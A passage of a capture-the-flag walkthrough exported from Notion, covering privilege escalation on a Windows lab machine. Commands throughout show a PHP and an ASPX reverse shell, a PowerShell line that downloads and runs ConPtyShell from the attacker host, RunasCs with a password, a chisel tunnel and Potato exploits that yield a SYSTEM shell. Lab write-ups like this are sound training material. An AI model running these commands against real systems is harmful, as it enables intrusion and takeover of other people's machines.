class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">We can get the user flag by going to Users share and reading from </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">C.Bum</code></span><span class="SemanticString">’s desktop.</span></span></p></div><h2 id="https://www.notion.so/68912a05281b4901bf0940d60216a22c" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/68912a05281b4901bf0940d60216a22c"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Privilege Escalation</span></span></h2><div id="https://www.notion.so/970a4ff4cf354a75884003d860c824bc" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">Gaining execution as C.Bum</strong></strong></strong></strong></strong></strong></strong></strong></strong></span></span></p></div><div id="https://www.notion.so/d14d40e6d9b24f4d941532c93feb1270" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Checking for what new privileges we have gained, we see that </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">C.Bum</code></span><span class="SemanticString"> can write on the Web share which contains the files hosted on the website:</span></span></p></div><div id="https://www.notion.so/e942999da72f4cd2860e23a70492d1d0" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ crackmapexec smb 10.10.11.187 -u 'C.Bum' -p 'Tikkycoll_431012284' --shares</code></span></span></p></div><pre id="https://www.notion.so/eb498a74f6304d09982bae3fc4e2a20c" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>SMB 10.10.11.187 445 G0 Share Permissions Remark
SMB 10.10.11.187 445 G0 ----- ----------- ------
SMB 10.10.11.187 445 G0 ADMIN$ Remote Admin
SMB 10.10.11.187 445 G0 C$ Default share
SMB 10.10.11.187 445 G0 IPC$ READ Remote IPC
SMB 10.10.11.187 445 G0 NETLOGON READ Logon server share
SMB 10.10.11.187 445 G0 Shared READ,WRITE
SMB 10.10.11.187 445 G0 SYSVOL READ Logon server share
SMB 10.10.11.187 445 G0 Users READ
SMB 10.10.11.187 445 G0 Web READ,WRITE</span></span></span></code></pre><div id="https://www.notion.so/bac29964104d4ce4babff3c943489f92" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">This is great as we have all of the ingredients to gain command execution as </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">C.Bum</code></span><span class="SemanticString">. We start by generating a PHP reverse shell using </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">msfvenom</code></span><span class="SemanticString"> and uploading it to the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Web</code></span><span class="SemanticString"> share.</span></span></p></div><div id="https://www.notion.so/4d8fe8dfeef245c1a67b1a18a500c601" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ msfvenom -p php/reverse_php LHOST=10.10.14.47 LPORT=6969 -f raw > rawr.php</code></span></span></p></div><div id="https://www.notion.so/68193b49651040c9a28a62db3591fc0a" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Next, we set up a listener for an incoming connection:</span></span></p></div><div id="https://www.notion.so/8e79eb70f7cb441b976b6ab13a4562a3" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nc -lvnp 6969</code></span></span></p></div><div id="https://www.notion.so/b019ad29a37343a58f4ed98d1c0af779" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Then, we can trigger the reverse shell by navigating to where we have uploaded the file. This gives us a primitive shell as </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">svc_apache</code></span><span class="SemanticString">.</span></span></p></div><div id="https://www.notion.so/19ef03a254574d3787560bd03bf3357d" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ curl http://10.10.11.187/rawr.php</code></span></span></p></div><div id="https://www.notion.so/6da3a82d67fb4a37929888e288ca2a45" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Using </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">conptyshell</code></span><span class="SemanticString"> (</span><span class="SemanticString"><span class="SemanticString__Fragment SemanticString__Fragment--Unknown">‣</span></span><span class="SemanticString">), we can upgrade to an interactive shell as </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">svc_apache</code></span><span class="SemanticString">, this will be useful for escalating to </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">C.Bum</code></span><span class="SemanticString">:</span></span></p></div><div id="https://www.notion.so/3e8105445dff4906bd149986c9165f01" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ stty raw -echo; (stty size; cat) | nc -lvnp 7777</code></span></span></p></div><div id="https://www.notion.so/6896ad8c8d6d4ce191a3d6bbb759bfcf" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> powershell.exe -c "IEX(IWR http://10.10.14.47:9090/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.10.14.47 7777"</code></span></span></p></div><div id="https://www.notion.so/b3e3a6634b274af0b73c4b430d37279f" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Finally, we use </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">RunasCs</code></span><span class="SemanticString"> to get a shell as </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">C.Bum</code></span><span class="SemanticString">:</span></span></p></div><div id="https://www.notion.so/8a57a7152bb14693b714b1134c636f83" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nc -lvnp 4747</code></span></span></p></div><div id="https://www.notion.so/c2865abad20f4c6e8686ff390fe37da9" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> .\RunasCs.exe C.Bum Tikkycoll_431012284 powershell.exe -r 10.10.14.47:4747</code></span></span></p></div><div id="https://www.notion.so/49b127b41d524bc29744ae26fb189402" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">Discovering an internal site</strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></span></span></p></div><div id="https://www.notion.so/b322ce6c3c174f5d9af62be6c9bd52da" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">We find the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">C:\inetpub</code></span><span class="SemanticString"> directory containing a separate IIS site not in production. Looking through </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">netstat</code></span><span class="SemanticString">, we also see that port 8000 is listening. This did not show up in our </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">nmap</code></span><span class="SemanticString"> scans before, suggesting it’s likely blocked by the firewall:</span></span></p></div><div id="https://www.notion.so/8de4503b01204c189f20e66d167a3146" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> netstat -a</code></span></span></p></div><pre id="https://www.notion.so/4593e7ae8c6d469387d900de9765ed25" class="Code"><code><span class="SemanticStringArray"><span class="SemanticString"><span>Active Connections
Proto Local Address Foreign Address State
TCP 0.0.0.0:80 g0:0 LISTENING
TCP 0.0.0.0:88 g0:0 LISTENING
TCP 0.0.0.0:135 g0:0 LISTENING
TCP 0.0.0.0:389 g0:0 LISTENING
TCP 0.0.0.0:443 g0:0 LISTENING
TCP 0.0.0.0:445 g0:0 LISTENING
TCP 0.0.0.0:464 g0:0 LISTENING
TCP 0.0.0.0:593 g0:0 LISTENING
TCP 0.0.0.0:636 g0:0 LISTENING
TCP 0.0.0.0:3268 g0:0 LISTENING
TCP 0.0.0.0:3269 g0:0 LISTENING
TCP 0.0.0.0:5985 g0:0 LISTENING
TCP 0.0.0.0:8000 g0:0 LISTENING
TCP 0.0.0.0:8080 g0:0 LISTENING
TCP 0.0.0.0:9389 g0:0 LISTENING
...</span></span></span></code></pre><div id="https://www.notion.so/132400bd8e7e4c2e980da5c6977cbce6" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Since port 8000 is closed by the firewall, we cannot access this site externally. We will need to forward port 8000 to our local machine through a reverse tunnel. We set up a listener on our end:</span></span></p></div><div id="https://www.notion.so/6a3b9f36b9694523a3fd46db2f97ca83" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ ./chisel server -p 9001 --reverse</code></span></span></p></div><div id="https://www.notion.so/b70ff555efa846cda6b7553626397762" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Then, on the victim, we forward port 8000 back to ourselves at port 9001:</span></span></p></div><div id="https://www.notion.so/b41a1a0300f649889dc50cb4021d19f4" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> .\chisel.exe client 10.10.14.47:9001 R:8000:127.0.0.1:8000</code></span></span></p></div><div id="https://www.notion.so/d46e09018b9143d8bc01a98eb56e0940" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">We can now connect to the site on our browser via http://127.0.0.1:8000/</span></span></p></div><div id="https://www.notion.so/37cb6fdbdad24d85a27aa9495ab15da6" class="Image Image--PageWidth"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F68b66cf0-9891-4937-8f0d-7511403c58d1%2FUntitled.png?width=1203&table=block&id=37cb6fdb-dad2-4d85-a27a-a9495ab15da6"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F68b66cf0-9891-4937-8f0d-7511403c58d1%2FUntitled.png?width=1203&table=block&id=37cb6fdb-dad2-4d85-a27a-a9495ab15da6" style="width:100%"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><div id="https://www.notion.so/cb40ede7a8bf40ed8ef07565ffaa9b9f" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">Gaining execution as DefaultAppPool</strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></span></span></p></div><div id="https://www.notion.so/6d75d97006e1430684ffb874d2586d2e" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">As the web developer, </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">C.Bum</code></span><span class="SemanticString"> can write to the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">C:\inetpub</code></span><span class="SemanticString"> directory, so let’s upload an ASPX reverse shell:</span></span></p></div><div id="https://www.notion.so/e9d628b02d904daab6e29ed6a87b06e1" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> Invoke-WebRequest -Uri 'http://10.10.14.47:9090/reverse.aspx' -o 'C:\inetpub\development\reverse.aspx'</code></span></span></p></div><div id="https://www.notion.so/498cb0fe2ab04af0817bfb20eb409c1c" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Start a listener at the designated port:</span></span></p></div><div id="https://www.notion.so/8b8bfa8475524e6297abaa15e0387c77" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nc -lvnp 4242</code></span></span></p></div><div id="https://www.notion.so/8025928dd59447cab9717a99f649367f" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">After visiting </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="http://127.0.0.1:8000/reverse.aspx">http://127.0.0.1:8000/reverse.aspx</a></span><span class="SemanticString">, we get a shell as </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">IIS AppPool\DefaultAppPool</code></span><span class="SemanticString">. Let’s see what privileges this account holds:</span></span></p></div><div id="https://www.notion.so/97398a0f99b540c1911d022e9d4983d2" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> whoami /all</code></span></span></p></div><pre id="https://www.notion.so/7b70c20452f942cfb3bf76ac3ab12ae0" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>USER INFORMATION
----------------
User Name SID
========================== =============================================================
iis apppool\defaultapppool S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level Label S-1-16-12288
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS Alias S-1-5-32-568 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
Unknown SID type S-1-5-82-0 Mandatory group, Enabled by default, Enabled group
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeMachineAccountPrivilege Add workstations to domain Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled</span></span></span></code></pre><div id="https://www.notion.so/8a7892d86f654bceb3863bad8b130722" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">Privilege escalation by abusing SeImpersonatePrivilege</strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></span></span></p></div><div id="https://www.notion.so/4d64a1bceca94310b8b2153f03895e29" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">We see that </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">IIS AppPool\DefaultAppPool</code></span><span class="SemanticString"> has </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">SeImpersonatePrivilege</code></span><span class="SemanticString">, this will allow us to escalate privileges to SYSTEM by using one of the “Potato” impersonation exploits, which leverages a privilege escalation chain as the following:</span></span></p></div><ol class="NumberedListWrapper"><li id="https://www.notion.so/493c95ae7e4c4ccfa0e3dbbd5a75d64c" class="NumberedList" value="1"><span class="SemanticStringArray"><span class="SemanticString">We trick the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">NT AUTHORITY\SYSTEM</code></span><span class="SemanticString"> account into authenticating via NTLM to a TCP endpoint we control.</span></span></li><li id="https://www.notion.so/c163c7f596ee4c4ea52d048af7ea1172" class="NumberedList" value="2"><span class="SemanticStringArray"><span class="SemanticString">We intercept this authentication attempt via a man-in-the-middle listener (there are several COM servers that can do this, notably the BITS service).</span></span></li><li id="https://www.notion.so/c273213b748b4e6890a845cb4be0a6d2" class="NumberedList" value="3"><span class="SemanticStringArray"><span class="SemanticString">Using the intercepted authentication attempt, we locally negotiate a security token for the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">NT AUTHORITY\SYSTEM</code></span><span class="SemanticString"> account using a series of Windows API calls.</span></span></li><li id="https://www.notion.so/eecb541790a34ce29f5be922a890fcaa" class="NumberedList" value="4"><span class="SemanticStringArray"><span class="SemanticString">Leveraging the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">SeImpersonatePrivilege</code></span><span class="SemanticString"> commonly found on service accounts, we impersonate this security token and gain command execution as </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">NT AUTHORITY\SYSTEM</code></span><span class="SemanticString">.</span></span></li></ol><div id="https://www.notion.so/0a33560ee2744d90a1790fcb7ed8fbdf" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">We begin by uploading a </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">ncat</code></span><span class="SemanticString"> binary onto the host, this will make getting a shell easier later:</span></span></p></div><div id="https://www.notion.so/939dcdaaebe442f0bb0e4744baa7f90c" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> Invoke-WebRequest -Uri 'http://10.10.14.47:9090/ncat.exe' -o 'ncat.exe'</code></span></span></p></div><div id="https://www.notion.so/d10e62f8d9994fe0b734a635bde25d8d" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Then, we start a listener on our machine:</span></span></p></div><div id="https://www.notion.so/aecb9dde6a1a4ca78384620e0e317c48" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nc -lvnp 4545</code></span></span></p></div><div id="https://www.notion.so/c87ec1d71b694e288ad52dc666f42527" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Using the JuicyPotatoNG exploit:</span></span></p></div><div id="https://www.notion.so/54299eb986ca46f795b4d6c70d20a6f1" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> .\JuicyPotatoNG.exe -t * -p "C:\Users\Public\Music\ncat.exe" -a "10.10.14.47 4545 -e powershell.exe"</code></span></span></p></div><div id="https://www.notion.so/452c8becb3e049379ef1c44cc94a764e" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">We can also use SharpEfsPotato, this works as it also depends on </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">SeImpersonatePrivilege</code></span><span class="SemanticString">:</span></span></p></div><div id="https://www.notion.so/8a6a17afde4247cc8ad2ca21831637de" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> .\SharpEfsPotato.exe -p "C:\Users\Public\Music\ncat.exe" -a "10.10.14.47 4545 -e powershell.exe"</code></span></span></p></div><div id="https://www.notion.so/720c16a5bfd54b41841dd0e3672c86ec" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">If the exploit was successful, we should get a reverse shell as </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">NT AUTHORITY\SYSTEM</code></span><span class="SemanticString">:</span></span></p></div><div id="https://www.notion.so/1e1ec69c70a944dc86b5d8b05020f9d5" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> whoami</code></span></span></p></div><pre id="https://www.notion.so/53082639758144f4b79a75e69051e3a3" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>nt authority\system</span></span></span></code></pre><div id="https://www.notion.so/63224947bba3449f8e3beed6d42b5805" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">And that’s it, we can get the root flag!</span></span></p></div><h2 id="https://www.notion.so/ddb87a3903064d76b9926409ce59a755" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/ddb87a3903064d76b9926409ce59a755"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Resources</span></span></h2><ol class="NumberedListWrapper"><li id="https://www.notion.so/9e4f6c71cb3a49199a87a81bbfb9f656" class="NumberedList" value="1"><span class="SemanticStringArray"><span class="SemanticString">SMB Share – SCF File Attacks - </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/">https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/</a></span></span><div id="https://www.notion.so/94264348bb3042029616c053af4de828" class="Bookmark"><a href="https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/"><h5 class="Bookmark__Title">SMB Share – SCF File Attacks</h5><p class="Bookmark__Desc">SMB is a protocol which is widely used across organisations for file sharing purposes. It is not uncommon during internal penetration tests to discover a file share which contains sensitive informa…</p><p class="Bookmark__Link">https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/</p></a></div></li><li id="https://www.notion.so/f6569abf27a044fb9745d36708093659" class="NumberedList" value="2"><span class="SemanticStringArray"><span class="SemanticString">MSFVenom Reverse Shell Payload Cheatsheet - </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/">https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/</a></span></span><div id="https://www.notion.so/7c3eae4959e34cb98b87d8ae29e062e5" class="Bookmark"><a href="https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/"><h5 class="Bookmark__Title">MSFVenom Reverse Shell Payload Cheatsheet (with & without Meterpreter)</h5><p class="Bookmark__Desc">Encrypt and Anonymize Your Internet Connection for as Little as $3/mo with PIA VPN. Learn More There are tons of cheatsheets out there, but I couldn’t find a comprehensive one that includes n…</p><p 